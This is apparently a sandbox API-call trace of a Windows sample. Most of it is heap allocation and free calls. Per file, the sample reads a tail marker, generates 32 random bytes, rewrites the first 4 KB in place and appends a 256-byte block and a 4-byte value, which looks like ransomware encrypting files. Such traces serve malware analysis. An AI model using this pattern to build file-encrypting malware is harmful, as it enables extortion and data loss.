RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0077.455] GetProcessHeap () returned 0x280000 [0077.455] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0077.455] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.455] WriteFile (in: hFile=0x81c, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0077.456] WriteFile (in: hFile=0x81c, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.456] GetProcessHeap () returned 0x280000 [0077.456] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0077.456] GetProcessHeap () returned 0x280000 [0077.456] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0077.456] GetProcessHeap () returned 0x280000 [0077.456] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0077.456] CloseHandle (hObject=0x81c) returned 1 [0077.457] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 37 [0077.457] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.458] ReadFile (in: hFile=0x820, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.458] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.458] GetProcessHeap () returned 0x280000 [0077.458] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.458] GetProcessHeap () returned 0x280000 [0077.458] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.458] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.458] GetProcessHeap () returned 0x280000 [0077.458] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.458] ReadFile (in: hFile=0x820, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.714] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.714] WriteFile (in: hFile=0x820, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.715] GetProcessHeap () returned 0x280000 [0077.715] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.715] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.716] GetProcessHeap () returned 0x280000 [0077.716] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.716] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.717] GetProcessHeap () returned 0x280000 [0077.717] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.717] GetProcessHeap () returned 0x280000 [0077.718] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.718] GetProcessHeap () returned 0x280000 [0077.718] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0077.719] GetProcessHeap () returned 0x280000 [0077.719] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0077.719] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.719] WriteFile (in: hFile=0x820, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0077.720] WriteFile (in: hFile=0x820, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.720] GetProcessHeap () returned 0x280000 [0077.720] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0077.720] GetProcessHeap () returned 0x280000 [0077.720] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0077.720] GetProcessHeap () returned 0x280000 [0077.720] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0077.720] CloseHandle (hObject=0x820) returned 1 [0077.722] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 38 [0077.722] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.722] ReadFile (in: hFile=0x824, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.722] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.722] GetProcessHeap () returned 0x280000 [0077.722] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.722] GetProcessHeap () returned 0x280000 [0077.722] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.722] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.722] GetProcessHeap () returned 0x280000 [0077.722] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.722] ReadFile (in: hFile=0x824, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.928] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.929] WriteFile (in: hFile=0x824, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.929] GetProcessHeap () returned 0x280000 [0077.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.930] GetProcessHeap () returned 0x280000 [0077.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0077.931] GetProcessHeap () returned 0x280000 [0077.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0077.932] GetProcessHeap () returned 0x280000 